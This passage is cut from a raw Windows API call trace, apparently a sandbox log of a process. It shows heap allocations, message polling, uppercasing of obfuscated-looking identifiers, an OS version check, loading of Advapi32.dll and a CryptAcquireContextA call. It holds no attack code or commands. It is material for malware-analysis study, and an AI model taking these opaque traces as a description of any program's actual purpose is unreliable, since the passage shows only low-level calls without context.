ftCreationTime.dwLowDateTime=0x3af6e5f0, ftCreationTime.dwHighDateTime=0x1d5cbeb, ftLastAccessTime.dwLowDateTime=0x4a391770, ftLastAccessTime.dwHighDateTime=0x1d5cdc3, ftLastWriteTime.dwLowDateTime=0x4a391770, ftLastWriteTime.dwHighDateTime=0x1d5cdc3, nFileSizeHigh=0x0, nFileSizeLow=0x11480, dwReserved0=0x0, dwReserved1=0x0, cFileName="mwiYwwD-pGtpU_YSC3.bmp", cAlternateFileName="MWIYWW~1.BMP")) returned 0x9e1bf8 [0210.883] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0210.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0210.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.884] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0210.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0210.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0210.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0210.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0210.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0210.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0210.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0210.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0210.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.885] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.885] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.886] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.886] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.886] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0210.886] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.886] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.886] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.886] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.887] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0210.887] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.887] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.887] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.888] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.888] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.889] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0210.889] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.889] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.889] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0210.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0210.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.889] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.889] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.889] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.889] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.889] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7180, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0210.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0210.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6e80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0210.890] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7be68) returned 1 [0210.891] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.891] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.891] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0210.891] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.891] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0210.891] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.891] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.891] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.891] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.891] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.891] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.891] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.891] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.891] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.891] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.891] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.891] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.891] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.891] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.891] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.892] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.892] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0210.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.892] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0210.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.902] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.902] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.917] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.917] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.917] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.917] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.917] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.917] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.917] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.920] PeekMessageW (in: lpMsg=0x8ced58, 